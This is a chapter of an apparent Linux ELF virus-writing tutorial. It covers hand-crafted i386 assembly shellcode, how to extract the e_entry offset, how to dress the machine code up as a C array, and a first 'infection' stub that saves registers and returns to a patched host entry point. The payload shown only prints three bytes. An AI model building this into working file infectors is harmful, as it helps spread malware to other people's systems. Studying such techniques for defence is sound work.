4. The language of evil


"Evil does seek to maintain power by suppressing the truth."

"Or by misleading the innocent."

  Spock and McCoy, "And The Children Shall Lead", star date 5029.5.

The code generated by gcc(1) is not suitable for a virus. So here comes hand crafted code. [1]

Source: src/evil_magic/i386_Linux_intel.S
		BITS 32
		global	_start
_start:		push	byte 4
		pop	eax		; eax = 4 = write(2)
		xor	ebx,ebx
		inc	ebx		; ebx = 1 = stdout
		mov	ecx,0x08048001	; ecx = magic address
		push	byte 3
		pop	edx		; edx = 3 = three characters
		int	0x80

		xor	eax,eax
		inc	eax		; eax = 1 = exit(2)
		xor	ebx,ebx		; ebx = 0 = return code
		int	0x80

Command: pre/i386-redhat8.0-linux/evil_magic/intel.sh

/usr/bin/nasm -f elf -o ${obj} ${src} \
&& /usr/bin/ld -o ${exe} ${obj} \
&& /usr/bin/strip ${exe} \
&& ${exe}

Output: out/i386-redhat8.0-linux/evil_magic/intel

Output is good. But how do we get the resulting machine code? We can't just add a call to printf(3) to the assembly code. Above example is not linked with glibc; it does not even have a function called main.

4.1. Offset of e_entry

On the other hand things became a lot easier. There is no initialization code that gets executed before _start, so the address of _start is really the ELF entry point of the executable. Time to have a closer look at the ELF header. Check out the code at Offset of e_entry (i)

Output: out/i386-redhat8.0-linux/evil_magic/ofs_entry

It's interesting that e_entry is at the same offset in both Elf32_Ehdr and Elf64_Ehdr (of course the size of the field is different).

The classic approach to extract this value from an executable is a combination of dd(1) and od(1). A first (and useless) prototype:

Command: pre/i386-redhat8.0-linux/evil_magic/od.sh
/bin/dd if=${file} bs=1 skip=24 count=8 | /usr/bin/od -x

Output: out/i386-redhat8.0-linux/evil_magic/od
0000000 8080 0804 0034 0000

dd can be replaced by od -j 24 on Solaris and Linux. FreeBSD's implementation spells that od +24. FreeBSD and Linux also provide hexdump -s 24. But unfortunately neither the traditional od nor the modern hexdump on FreeBSD can process 8 byte values. Still worse, I know one installation of alpha-m/additional.cs.xml where perl is compiled without 64-bit support. To reliably cover 64-bit platforms (especially big endian Ultra-Sparc) we need more power.

4.2. Extracting e_entry

Source is at Extracting e_entry (i). Also used at The entry point.

Command: pre/i386-redhat8.0-linux/evil_magic/e_entry.sh
tmp/i386-redhat8.0-linux/evil_magic/e_entry \

Output: out/i386-redhat8.0-linux/evil_magic/e_entry
8048080 128

The entry point is specified as a virtual address in memory. By subtracting the base address we get the file offset.

Offset of entry point in file:

0x8048080 - 0x8048000 = 0x80 = 128

4.3. Devil in disguise

There is still one thing left: Dressing up the hex dump as C source. We use the script from Dressing up binary code (i).

Output = Source: out/i386-redhat8.0-linux/evil_magic/evil_magic.c
const unsigned char main[]
__attribute__ (( aligned(8), section(".text") )) =
  0x6A,0x04,                     /* 08048080: push byte +0x4         */
  0x58,                          /* 08048082: pop eax                */
  0x31,0xDB,                     /* 08048083: xor ebx,ebx            */
  0x43,                          /* 08048085: inc ebx                */
  0xB9,0x01,0x80,0x04,0x08,      /* 08048086: mov ecx,0x8048001      */
  0x6A,0x03,                     /* 0804808B: push byte +0x3         */
  0x5A,                          /* 0804808D: pop edx                */
  0xCD,0x80,                     /* 0804808E: int 0x80               */
  0x31,0xC0,                     /* 08048090: xor eax,eax            */
  0x40,                          /* 08048092: inc eax                */
  0x31,0xDB,                     /* 08048093: xor ebx,ebx            */
  0xCD,0x80                      /* 08048095: int 0x80               */
}; /* 23 bytes (0x17) */

Calling the string constant main is not a mistake. Above output is a complete and valid C program. [2]

Command: pre/i386-redhat8.0-linux/evil_magic/cc.sh
/usr/bin/gcc \
	-Wall -O1 -I . -I out/i386-redhat8.0-linux -D NDEBUG \
	out/i386-redhat8.0-linux/evil_magic/evil_magic.c \
	-o tmp/i386-redhat8.0-linux/evil_magic/cc \
2>&1 | /usr/bin/fmt -s \
&& tmp/i386-redhat8.0-linux/evil_magic/cc

Output: out/i386-redhat8.0-linux/evil_magic/cc
out/i386-redhat8.0-linux/evil_magic/evil_magic.c:2: warning: `main'
is usually a function

4.4. Infection #1

Up to now our code is intended to be stand-alone. Obviously we must replace the call to exit(2). Instead we have to resume with the original code of the host executable. The last line of assembler code is used to specify the offset of a spot to patch with the original entry address. This ends up in the definition of ENTRY_POINT_OFS required by the framework in One step closer to the edge (i). Note the "i1" in the path of the file name. This is just the first implementation. It will be replaced later on.

Anyway, I think it's a better idea to let our code end with an unsuspicious ret instead of a jmp. And we can put the matching push at the start of the code to have the actual return address at a constant location. And while we are at it, saving all registers and the flags can't be bad.

Source: src/one_step_closer/i1/i386_Linux_intel.S
		BITS 32
start:		push	dword 0		; replace with original entry address

		push	byte 4
		pop	eax		; eax = 4 = write(2)
		xor	ebx,ebx
		inc	ebx		; ebx = 1 = stdout
		mov	ecx,0x08048001	; ecx = magic address
		push	byte 3
		pop	edx		; edx = 3 = three characters
		int	0x80


		push	byte start + 1	; dummy instruction to specify ofs

Command: pre/i386-redhat8.0-linux/one_step_closer/intel.sh
dst=$1; shift

/usr/bin/nasm -f bin -o ${tmp_dst} \
	./src/one_step_closer/${inf_dir}/i386_Linux_intel.S \
&& /usr/bin/ndisasm -U ${tmp_dst} \
| ./src/platform/disasm.pl \
	"-last_line_is_ofs=" \
	"-identifier=infection" \
	"$@" > ${dst}

Output = Source: out/i386-redhat8.0-linux/one_step_closer/i1/infection.inc
const unsigned char infection[]
__attribute__ (( aligned(8), section(".text") )) =
  0x68,0x00,0x00,0x00,0x00,      /* 00000000: push dword 0x0         */
  0x9C,                          /* 00000005: pushf                  */
  0x60,                          /* 00000006: pusha                  */
  0x6A,0x04,                     /* 00000007: push byte +0x4         */
  0x58,                          /* 00000009: pop eax                */
  0x31,0xDB,                     /* 0000000A: xor ebx,ebx            */
  0x43,                          /* 0000000C: inc ebx                */
  0xB9,0x01,0x80,0x04,0x08,      /* 0000000D: mov ecx,0x8048001      */
  0x6A,0x03,                     /* 00000012: push byte +0x3         */
  0x5A,                          /* 00000014: pop edx                */
  0xCD,0x80,                     /* 00000015: int 0x80               */
  0x61,                          /* 00000017: popa                   */
  0x9D,                          /* 00000018: popf                   */
  0xC3                           /* 00000019: ret                    */
}; /* 28 bytes (0x1c) */
enum { ENTRY_POINT_OFS = 0x1 };



Optimized for size. Twenty three is the perfect number of bytes. See http://www.goethe.de/uk/mon/archiv/gh00/e23.htm


Even experienced hackers seem to be stunned about this one. The idea is quit famous, though. It won the first International Obfuscated C Coding Contest in 1984. See http://www.es.ioccc.org/1984/mullender.c and http://www.es.ioccc.org/1984/mullender.hint.